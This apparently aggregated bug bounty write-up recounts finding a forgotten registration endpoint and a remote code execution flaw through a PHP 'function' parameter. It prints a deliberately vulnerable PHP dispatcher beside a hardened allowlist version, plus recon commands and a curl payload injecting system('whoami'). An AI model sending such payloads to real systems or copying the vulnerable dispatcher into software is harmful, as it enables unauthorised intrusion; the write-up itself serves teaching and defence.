During the recon phase of a private bug bounty program, I discovered a domain hosting an internal application with no registration allowed. After examining the JS files on the login page and finding no endpoints, I shifted focus to the subdomains identified by my recon tool. One subdomain, likely the API for the application, caught my attention. For instance, if the application subdomain was app1.domain[.]com, the API subdomain was app1api.domain[.]com.
Through fuzzing, I stumbled upon an endpoint like /company/registertest, which appeared to be a forgotten development endpoint allowing account creation. Despite the broad scope of the bug bounty program (*.domain[.]com), I registered an account and explored further, eventually uncovering a Remote Code Execution (RCE) vulnerability. The RCE was straightforward, involving an AJAX call in a JS file to a PHP file with a parameter named “function.”
This discovery underscores the importance of thinking about impact before reporting findings. If the application or subdomain is in scope, consider how to demonstrate a more significant impact rather than rushing to report initial findings.
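The write-up only says that an AJAX call hit a PHP file with a parameter named “function”; it does not show the server-side code. The block below is an added illustration, not Martín's code or the target's: it assumes the sink was `call_user_func_array` on the client-supplied name (an `eval` sink is the other common variant), and the action names, `args` parameter and company data are made up for the demo. It puts the vulnerable dispatcher beside an allowlisted one so the difference is visible, and feeds both a constructed legitimate request and a constructed attack request in place of `$_POST`, so it runs from the CLI with no web server.

```php
<?php
// Added illustration of the "function" parameter RCE pattern.
// ASSUMPTION: the vulnerable sink is call_user_func_array on a client-chosen
// function name. The report does not show the real code; action names and
// data below are constructed for the demo.
declare(strict_types=1);

// --- Vulnerable handler: the client names the PHP function that runs. -----
function vulnerable_dispatch(array $request): string
{
    $fn   = $request['function'] ?? '';
    $args = is_array($request['args'] ?? null) ? array_values($request['args']) : [];
    if (!is_string($fn) || !is_callable($fn)) {
        return 'error: not callable';
    }
    // Any callable name is accepted here: system, exec, passthru, shell_exec...
    ob_start();
    $ret     = call_user_func_array($fn, $args);
    $printed = (string) ob_get_clean();
    return $printed !== '' ? $printed : (is_scalar($ret) ? (string) $ret : '');
}

// --- Hardened handler: a fixed allowlist maps action names to functions. ---
const ALLOWED_ACTIONS = [
    'listCompanies' => 'action_list_companies',
    'getCompany'    => 'action_get_company',
];

function action_list_companies(): string
{
    return json_encode(['acme', 'globex']);          // constructed sample data
}

function action_get_company(string $id): string
{
    return json_encode(['id' => $id]);               // constructed sample data
}

function hardened_dispatch(array $request): string
{
    $action = $request['function'] ?? '';
    if (!is_string($action) || !array_key_exists($action, ALLOWED_ACTIONS)) {
        return 'error: unknown action';
    }
    $args = is_array($request['args'] ?? null) ? array_values($request['args']) : [];
    // Only the mapped internal function can run; the client never supplies
    // a callable, only a key into ALLOWED_ACTIONS.
    return call_user_func_array(ALLOWED_ACTIONS[$action], array_map('strval', $args));
}

// Constructed requests standing in for $_POST (nothing touches the network).
$legitVuln = ['function' => 'action_get_company', 'args' => ['42']];
$legitHard = ['function' => 'getCompany',         'args' => ['42']];
$attack    = ['function' => 'system',             'args' => ['whoami']];

echo 'vulnerable/legit:  ', vulnerable_dispatch($legitVuln), PHP_EOL;  // {"id":"42"}
echo 'vulnerable/attack: ', vulnerable_dispatch($attack),    PHP_EOL;  // runs whoami on the server
echo 'hardened/legit:    ', hardened_dispatch($legitHard),   PHP_EOL;  // {"id":"42"}
echo 'hardened/attack:   ', hardened_dispatch($attack),      PHP_EOL;  // error: unknown action
```

Run it with `php demo.php`. The hardened version still uses `call_user_func_array`, which is the point: the fix is not to avoid dynamic dispatch but to make sure the only thing the client controls is a lookup key into a server-side table, so `system` is rejected before anything is resolved to a callable.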
Practice-Verified Commands and Tools:
1. Recon Tools:
- Use `amass` for subdomain enumeration:
amass enum -d domain.com
- Use `ffuf` for fuzzing endpoints:
ffuf -w /path/to/wordlist.txt -u https://app1api.domain.com/FUZZ
2. RCE Exploitation:
- If you identify a parameter of this kind, confirm execution with a harmless command before anything else. The payload shape depends on how the PHP code consumes the value: the form below only works where the value is passed to `eval`; where it is passed to `call_user_func`, the value must be a bare function name instead. `vulnerable_endpoint.php` is a placeholder, since the report does not name the file:
curl -X POST -d "function=system('whoami');" https://app1api.domain.com/vulnerable_endpoint.php
3. API Testing:
- Use `Postman` or `curl` to test API endpoints. Send a `Content-Type` header so the server actually parses the JSON body; the field names below are placeholders, so take the real ones from the application's JS:
curl -X POST -H "Content-Type: application/json" -d '{"username":"test","password":"test"}' https://app1api.domain.com/company/registertest
4. Wordlist Customization:
- Tailor wordlists using `cewl`:
cewl -w custom_wordlist.txt https://app1.domain.com
What Undercode Say:
In the realm of cybersecurity, reconnaissance and persistence often lead to significant discoveries. Martín Martín’s experience highlights the importance of thorough recon and thinking beyond the obvious. Tools like `amass`, `ffuf`, and `cewl` are indispensable for bug bounty hunters. When testing for vulnerabilities, always consider the broader impact, as Martín did by exploring the forgotten endpoint.
For those diving into bug bounty programs, mastering Linux commands like `curl`, `grep`, and `awk` can streamline your workflow. For example, use `grep` to filter through large datasets:
grep "interesting_pattern" large_file.txt
On Windows, PowerShell commands like `Invoke-WebRequest` can be equally powerful (again, declare the content type so the JSON body is parsed):
Invoke-WebRequest -Uri https://app1api.domain.com/company/registertest -Method POST -ContentType 'application/json' -Body '{"username":"test","password":"test"}'
Always remember to configure your tools properly, as Martín emphasized. For instance, supply API keys for the data sources `amass` queries (set in its config file) so passive enumeration returns more than the free sources alone; `ffuf` takes no API keys, but it does need a wordlist and match/filter settings suited to the target. Additionally, customizing wordlists based on your target can yield better results than relying on generic lists.
Finally, sharing experiences and learning from others, as Martín did, is invaluable. Whether through platforms like LinkedIn or community forums, collaboration and knowledge exchange are key to growth in cybersecurity. Keep exploring, keep learning, and always think about the bigger picture.
For further reading on recon techniques and bug bounty tips, check out Martín’s LinkedIn posts:
– Bug Bounty Tips
– Advanced Recon Strategies
References:
Hackers Feeds, Undercode AI